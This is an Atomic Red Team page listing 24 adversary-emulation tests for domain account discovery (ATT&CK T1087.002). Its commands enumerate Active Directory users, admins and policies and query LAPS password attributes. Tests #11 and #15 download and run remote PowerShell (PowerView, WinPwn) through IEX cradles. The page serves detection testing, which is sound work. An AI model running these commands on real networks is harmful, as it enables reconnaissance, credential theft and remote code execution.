Skip to content
Atomic Red Team
atomics
T1087.002

T1087.002 - Account Discovery: Domain Account

Description from ATT&CK (opens in a new tab)

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as net user /domain and net group /domain of the Net (opens in a new tab) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. PowerShell (opens in a new tab) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)

Atomic Tests


Atomic Test #1 - Enumerate all accounts (Domain)

Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session

Supported Platforms: Windows

auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e

Attack Commands: Run with command_prompt!

net user /domain
net group /domain


Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)

Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.

Supported Platforms: Windows

auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2

Attack Commands: Run with powershell!

net user /domain
get-localgroupmember -group Users
get-aduser -filter *


Atomic Test #3 - Enumerate logged on users via CMD (Domain)

Enumerate logged on users. Upon exeuction, logged on users will be displayed.

Supported Platforms: Windows

auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7

Inputs:

NameDescriptionTypeDefault Value
computer_nameName of remote system to querystring%COMPUTERNAME%

Attack Commands: Run with command_prompt!

query user /SERVER:#{computer_name}


Atomic Test #4 - Automated AD Recon (ADRecon)

ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.

Supported Platforms: Windows

auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59

Inputs:

NameDescriptionTypeDefault Value
adrecon_pathPath of ADRecon.ps1 filepathPathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1

Attack Commands: Run with powershell!

Invoke-Expression "#{adrecon_path}"

Cleanup Commands:

Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse

Dependencies: Run with powershell!

Description: ADRecon must exist on disk at specified location (#{adrecon_path})
Check Prereq Commands:
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"


Atomic Test #5 - Adfind -Listing password policy

Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/ (opens in a new tab), https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


Atomic Test #6 - Adfind - Enumerate Active Directory Admins

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/ (opens in a new tab), https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


Atomic Test #7 - Adfind - Enumerate Active Directory User Objects

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/ (opens in a new tab), https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects

Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/ (opens in a new tab), https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string

Attack Commands: Run with command_prompt!

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}

Dependencies: Run with powershell!

Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands:
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"


Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)

This test will enumerate the details of the built-in domain admin account

Supported Platforms: Windows

auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef

Attack Commands: Run with command_prompt!

net user administrator /domain


Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation

Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce (opens in a new tab) Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user

Supported Platforms: Windows

auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b

Inputs:

NameDescriptionTypeDefault Value
domainDomain FQDNstring$env:UserDnsDomain
uac_propUAC Property to searchinteger524288

Attack Commands: Run with powershell!

Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}

Dependencies: Run with powershell!

Description: PowerShell ActiveDirectory Module must be installed
Check Prereq Commands:
Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}
Get Prereq Commands:
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
  Install-WindowsFeature RSAT-AD-PowerShell
}


Atomic Test #11 - Get-DomainUser with PowerView

Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.

Supported Platforms: Windows

auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose


Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher

The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3

Attack Commands: Run with powershell!

([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()


Atomic Test #13 - Enumerate Linked Policies In ADSISearcher Discovery

The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 7ab0205a-34e4-4a44-9b04-e1541d1a57be

Attack Commands: Run with powershell!

(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}


Atomic Test #14 - Enumerate Root Domain linked policies Discovery

The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81 (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 00c652e2-0750-4ca6-82ff-0204684a6fe4

Attack Commands: Run with powershell!

(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}


Atomic Test #15 - WinPwn - generaldomaininfo

Gathers general domain information using the generaldomaininfo function of WinPwn

Supported Platforms: Windows

auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput


Atomic Test #16 - Kerbrute - userenum

Enumerates active directory usernames using the userenum function of Kerbrute

Supported Platforms: Windows

auto_generated_guid: f450461c-18d1-4452-9f0d-2c42c3f08624

Inputs:

NameDescriptionTypeDefault Value
DomainDomain that is being tested againststring$env:USERDOMAIN
DomainControllerDomain Controller that is being tested againststring$env:UserDnsDomain

Attack Commands: Run with powershell!

cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"

Dependencies: Run with powershell!

Description: kerbrute.exe must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
Description: username text file must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"


Atomic Test #17 - Wevtutil - Discover NTLM Users Remote

This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. Reference (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe

Attack Commands: Run with powershell!

$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'

Cleanup Commands:

Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx


Atomic Test #18 - Suspicious LAPS Attributes Query with Get-ADComputer all properties

This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe

Inputs:

NameDescriptionTypeDefault Value
hostnameName of the hoststring$env:computername

Attack Commands: Run with powershell!

Get-ADComputer #{hostname} -Properties *


Atomic Test #19 - Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property

This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 6e85bdf9-7bc4-4259-ac0f-f0cb39964443

Inputs:

NameDescriptionTypeDefault Value
hostnameName of the hoststring$env:computername

Attack Commands: Run with powershell!

Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime


Atomic Test #20 - Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope

This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5

Attack Commands: Run with powershell!

Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *


Atomic Test #21 - Suspicious LAPS Attributes Query with adfind all properties

This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string
domainDomain of the hoststring$env:USERDOMAIN

Attack Commands: Run with powershell!

& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *


Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd

This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime

Supported Platforms: Windows

auto_generated_guid: 51a98f96-0269-4e09-a10f-e307779a8b05

Inputs:

NameDescriptionTypeDefault Value
optional_argsAllows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.string
domainDomain of the hoststring$env:USERDOMAIN

Attack Commands: Run with powershell!

& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime


Atomic Test #23 - Active Directory Domain Search

Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory

Supported Platforms: Linux

auto_generated_guid: 096b6d2a-b63f-4100-8fa0-525da4cd25ca

Inputs:

NameDescriptionTypeDefault Value
domainThe domain to be testedstringexample
top_level_domainThe top level domain (.com, .test, .remote, etc... following domain, minus the .)stringtest
userusername@domain of a user within the ad databasestringuser@example.test
passwordpassword of the user with admin privileges referenced in admin_userstrings3CurePssw0rD!

Attack Commands: Run with sh!

ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn

Dependencies: Run with sh!

Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
Check Prereq Commands:
which ldapsearch
Get Prereq Commands:
echo ldapsearch not found


Atomic Test #24 - Account Enumeration with LDAPDomainDump

This test uses LDAPDomainDump to perform account enumeration on a domain. Reference (opens in a new tab)

Supported Platforms: Linux

auto_generated_guid: a54d497e-8dbe-4558-9895-44944baa395f

Inputs:

NameDescriptionTypeDefault Value
usernameUsername and domain to authenticate withstringdomain\user
target_ipIP to connect tostring127.0.0.1
passwordPassword to authenticate withstringpassword

Attack Commands: Run with sh!

ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087

Cleanup Commands:

rm -rf /tmp/T1087/ 2>/dev/null

Dependencies: Run with sh!

Description: Python3 must be installed
Check Prereq Commands:
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
sudo apt-get -y install python3
Description: Pip must be installed
Check Prereq Commands:
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
Description: The ldapdomaindump module must be installed
Check Prereq Commands:
python3 -c 'import ldapdomaindump' 2>/dev/null
Get Prereq Commands:
pip install ldapdomaindump
Description: The future module must be installed
Check Prereq Commands:
python3 -c 'import future' 2>/dev/null
Get Prereq Commands:
pip install future

Last updated on